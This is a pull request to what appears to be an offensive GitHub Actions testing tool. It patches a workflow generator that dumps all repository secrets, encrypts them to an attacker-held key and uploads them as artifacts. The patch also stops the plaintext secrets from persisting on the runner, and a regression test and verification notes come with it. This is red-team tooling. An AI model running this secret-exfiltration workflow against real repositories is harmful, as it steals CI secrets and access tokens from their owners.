### PR TITLE
fix(attack/secrets): don't write plaintext secrets to the runner workspace

### DIFF
--- a/gatox/attack/secrets/secrets_attack.py
+++ b/gatox/attack/secrets/secrets_attack.py
@@ -92,33 +92,33 @@ class SecretsAttack(Attacker):
 
         artifact_name = "files-${{ matrix.safe_name }}" if environments else "files"
 
+        # Plaintext is piped directly into openssl via stdin so it never lands
+        # on the runner workspace disk. On a self-hosted runner the workspace
+        # persists between jobs; an earlier version wrote output.json to disk
+        # and never deleted it, leaking all secrets in plaintext.
         test_job = {
             "runs-on": runner or ["ubuntu-latest"],
             "steps": [
                 {
-                    "env": {"VALUES": "${{ toJSON(secrets)}}"},
-                    "name": "Prepare repository",
-                    "run": """
-cat <<EOF > output.json
-$VALUES
-EOF
-                    """,
-                },
-                {
                     "name": "Run Tests",
-                    "env": {"PUBKEY": pubkey},
-                    "run": "aes_key=$(openssl rand -hex 12 | tr -d '\\n');"
-                    "openssl enc -aes-256-cbc -pbkdf2 -in output.json -out output_updated.json -pass pass:$aes_key;"
-                    'echo $aes_key | openssl rsautl -encrypt -pkcs -pubin -inkey <(echo "$PUBKEY") -out lookup.txt 2> /dev/null;',
+                    "env": {
+                        "VALUES": "${{ toJSON(secrets)}}",
+                        "PUBKEY": pubkey,
+                    },
+                    "run": (
+                        "aes_key=$(openssl rand -hex 12 | tr -d '\\n');"
+                        'printf %s "$VALUES" | openssl enc -aes-256-cbc -pbkdf2'
+                        " -out output_updated.json -pass pass:$aes_key;"
+                        'printf %s "$aes_key" | openssl rsautl -encrypt -pkcs'
+                        ' -pubin -inkey <(echo "$PUBKEY") -out lookup.txt 2> /dev/null;'
+                    ),
                 },
-                # Upload the encrypted files as workflow run artifacts.
-                # This avoids the edge case where there is a secret set to a value that is in the Base64 (which breaks everything).
                 {
                     "name": "Upload artifacts",
                     "uses": "actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a",
                     "with": {
                         "name": artifact_name,
-                        "path": " |\noutput_updated.json\nlookup.txt",
+                        "path": "output_updated.json\nlookup.txt",
                     },
                 },
             ],

--- a/unit_test/test_secrets_attack.py
+++ b/unit_test/test_secrets_attack.py
@@ -31,6 +31,33 @@ def test_create_secret_exil_yaml():
     assert "matrix" not in yaml
 
 
+def test_exfil_yaml_does_not_write_plaintext_to_disk():
+    """Regression: plaintext secrets must never be written to the runner workspace.
+
+    An earlier version wrote ${{ toJSON(secrets) }} to output.json via
+    `cat <<EOF > output.json` and never removed it; on a self-hosted runner
+    the workspace persists between jobs, so the plaintext was readable by
+    later jobs / anyone with runner shell access. The fix pipes $VALUES
+    directly into openssl enc via stdin.
+    """
+    import yaml as _yaml
+
+    _priv, pub = SecretsAttack._SecretsAttack__create_private_key()
+    yaml_str = SecretsAttack.create_exfil_yaml(pub, "evilBranch")
+    workflow = _yaml.safe_load(yaml_str)
+    steps = workflow["jobs"]["testing"]["steps"]
+    run_commands = " ".join(s["run"] for s in steps if "run" in s)
+
+    assert (
+        "output.json" not in run_commands
+    ), "plaintext file output.json must not appear in any run command"
+    assert (
+        "cat <<EOF" not in run_commands
+    ), "heredoc-to-file pattern leaks plaintext on the runner"
+    # Ciphertext piped via stdin — plaintext stays in process memory only.
+    assert 'printf %s "$VALUES" | openssl enc' in run_commands
+
+
 def test_create_secret_exfil_yaml_environments():
     """Test YAML generation includes a matrix when environments are provided."""
     priv, pub = SecretsAttack._SecretsAttack__create_private_key()


### PR DESCRIPTION
## Summary

`SecretsAttack.create_exfil_yaml` writes `${{ toJSON(secrets) }}` to `output.json` on the runner workspace, encrypts it to `output_updated.json`, and then leaves `output.json` in place. The plaintext file persists through end of job. On a self-hosted runner the workspace persists between jobs by default, so the file is readable by any later job or by anyone with shell access on the runner.

The `github_token` injected into `toJSON(secrets)` is included, so a short-lived but valid `ghs_` token also lands on disk in plaintext.

This is independent of `--delete-run`. That flag only deletes the workflow run record in the repo. It does not touch files on the runner.

## Type of change
- [x] Bug fix
- [ ] New feature
- [ ] Breaking change
- [ ] Other

## Root cause

`gatox/attack/secrets/secrets_attack.py:create_exfil_yaml` emits two run steps:

```yaml
- name: Prepare repository
  env:
    VALUES: ${{ toJSON(secrets)}}
  run: |
    cat <<EOF > output.json
    $VALUES
    EOF
- name: Run Tests
  run: |
    openssl enc -aes-256-cbc -pbkdf2 \
      -in output.json -out output_updated.json -pass pass:$aes_key
    # output.json is not removed
```

There is no `rm output.json` and no cleanup step. Verified end-of-job state on a github-hosted runner with a debug step appended to the workflow:

```
=== ls -la ===
-rw-r--r-- 1 runner runner  512  lookup.txt
-rw-r--r-- 1 runner runner  108  output.json
-rw-r--r-- 1 runner runner  128  output_updated.json
```

Pulled `output.json` back as a debug artifact and contents were:

```json
{
  "github_token": "ghs_REDACTED",
  "CANARY": "PROOF-CANARY-ON-DISK-7d3e9f"
}
```

On github-hosted runners the VM is torn down after the job so the file goes with it. On self-hosted runners the workspace persists between jobs by default and the file remains until something else writes over it, which is the typical target for `gato-x attack --secrets`.

## Fix

Collapse the two steps into one and pipe `$VALUES` directly into `openssl enc` via stdin. The plaintext is never written to a file:

```yaml
- name: Run Tests
  env:
    VALUES: ${{ toJSON(secrets)}}
    PUBKEY: <pubkey>
  run: |
    aes_key=$(openssl rand -hex 12 | tr -d '\n')
    printf %s "$VALUES" | openssl enc -aes-256-cbc -pbkdf2 \
      -out output_updated.json -pass pass:$aes_key
    printf %s "$aes_key" | openssl rsautl -encrypt -pkcs -pubin \
      -inkey <(echo "$PUBKEY") -out lookup.txt 2> /dev/null
```

Verified on the same runner: the debug step now reports `GOOD: no plaintext on disk` and `output.json` does not appear in `ls -la`.

Also fixed `path: ' |\noutput_updated.json\nlookup.txt'` on the `upload-artifact` step. The leading ` |` was a literal non-matching path that `upload-artifact` silently skipped. Replaced with a normal two-line list.

## Testing

Unit tests:

- `pytest unit_test/` passes (557 tests).
- New regression test `test_exfil_yaml_does_not_write_plaintext_to_disk` parses the emitted YAML and asserts no `run` command references `output.json` or `cat <<EOF`, and that `printf %s "$VALUES" | openssl enc` is present.
- `black` and `ruff` clean on the two touched files.

End-to-end on a real github-hosted runner:

- 1 secret with a canary value: artifact decrypts to the canary, debug step reports `output.json` absent from workspace.
- 4 mask-breaker shapes (embedded quote, embedded newline, all digits, 2 chars): all decrypt, no plaintext on disk.
- 10 secrets totaling 24226 bytes of resolved JSON (includes 16KB random hex secret and 5.5KB base64 secret): all 11 entries (10 + auto-injected `github_token`) recovered via the existing decrypt path, no plaintext on disk, encrypted artifact is 24256 bytes.

## Files changed

- `gatox/attack/secrets/secrets_attack.py`: collapse two steps into one, pipe via stdin, fix `upload-artifact` path field.
- `unit_test/test_secrets_attack.py`: regression test.